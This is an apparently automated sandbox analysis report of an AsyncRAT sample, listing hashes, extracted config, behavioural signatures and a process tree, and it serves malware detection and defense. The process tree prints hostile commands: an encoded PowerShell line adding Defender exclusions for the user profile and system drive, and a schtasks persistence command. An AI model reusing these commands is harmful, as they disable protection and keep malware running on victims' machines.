Analysis
-
max time kernel
59s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
20/04/2025, 19:24
Static task
static1
Behavioral task
behavioral1
Sample
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe
Resource
win11-20250410-en
General
-
Target
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe
-
Size
57KB
-
MD5
ea80d619808889ea8edb799056a67bc1
-
SHA1
de591d83c5e24498a294366205d0a12d2098385c
-
SHA256
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9
-
SHA512
d7e43ccd9a2f4f0d959d49ddc089a90da4e7e00cde0480c849d5078cf6127d5a15f4229067170399e6722a574b43f2121f9cbc8b34768b844583adacaff07929
-
SSDEEP
1536:KERi5rR21kXfc3dLnUAfUgc2vZnmHYUTmu1ycX9D:3RV6EpUgcTmu1ycX9D
Malware Config
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:2009
jc1XWfeoz50P
-
delay
10
-
install
true
-
install_file
executor.exe
-
install_folder
%Temp%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000d0000000227b7-20.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation PEInstaller.exe -
Executes dropped EXE 2 IoCs
pid Process 5012 PEInstaller.exe 740 executor.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language executor.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4172 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3272 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2544 powershell.exe 2544 powershell.exe 2716 powershell.exe 2716 powershell.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe 5012 PEInstaller.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 5012 PEInstaller.exe Token: SeDebugPrivilege 740 executor.exe Token: SeDebugPrivilege 740 executor.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3116 wrote to memory of 2544 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 85 PID 3116 wrote to memory of 2544 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 85 PID 3116 wrote to memory of 2716 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 90 PID 3116 wrote to memory of 2716 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 90 PID 3116 wrote to memory of 5012 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 92 PID 3116 wrote to memory of 5012 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 92 PID 3116 wrote to memory of 5012 3116 2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe 92 PID 5012 wrote to memory of 2304 5012 PEInstaller.exe 94 PID 5012 wrote to memory of 2304 5012 PEInstaller.exe 94 PID 5012 wrote to memory of 2304 5012 PEInstaller.exe 94 PID 5012 wrote to memory of 4712 5012 PEInstaller.exe 96 PID 5012 wrote to memory of 4712 5012 PEInstaller.exe 96 PID 5012 wrote to memory of 4712 5012 PEInstaller.exe 96 PID 2304 wrote to memory of 3272 2304 cmd.exe 98 PID 2304 wrote to memory of 3272 2304 cmd.exe 98 PID 2304 wrote to memory of 3272 2304 cmd.exe 98 PID 4712 wrote to memory of 4172 4712 cmd.exe 99 PID 4712 wrote to memory of 4172 4712 cmd.exe 99 PID 4712 wrote to memory of 4172 4712 cmd.exe 99 PID 4712 wrote to memory of 740 4712 cmd.exe 100 PID 4712 wrote to memory of 740 4712 cmd.exe 100 PID 4712 wrote to memory of 740 4712 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe"C:\Users\Admin\AppData\Local\Temp\2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBmACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB4AG0AYwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAYQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Users\Admin\AppData\Roaming\PEInstaller.exe"C:\Users\Admin\AppData\Roaming\PEInstaller.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAD38.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4172
-
-
C:\Users\Admin\AppData\Local\Temp\executor.exe"C:\Users\Admin\AppData\Local\Temp\executor.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5ed803e4374811829108cd9a0d098e053
SHA157b506ab3d871b0fa74803ddc70e622bfebf9852
SHA2566374d86ae4dd3f91904588bb3df6b8cddcaed74b3ccb02b4a6285b258621016b
SHA5128de19c7b0eb35e940e71692ebcb429f32e2689e6edbccbc554317ffcebbae23a78bbf6375fc9eb8b9aa0a03a06fa23e8849ca96de0227349ed110f454fdd6c80
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
155B
MD5f4734f2bb326744d8abb006cd30c5cc9
SHA1df1a747bc787874a131c22a806e8496cdd235bc2
SHA256c497b40270788369140f91f2e61a08756095ed595bea54300dd5c2ab2fc51ef4
SHA5122dc760b8deba58b63770a786593ece2729c18f33b7813ed645c2c4d0a3ba61239fa4b966a2051ab387d8bb931deff9d49eaadbb8d376ebfff6c00ae53d8d860e
-
Filesize
48KB
MD5a96ef57452d73871dc1045b96fddcf96
SHA17a9b28306b0fc32d4281b756be5bc91f53234696
SHA2562fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
SHA51214db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e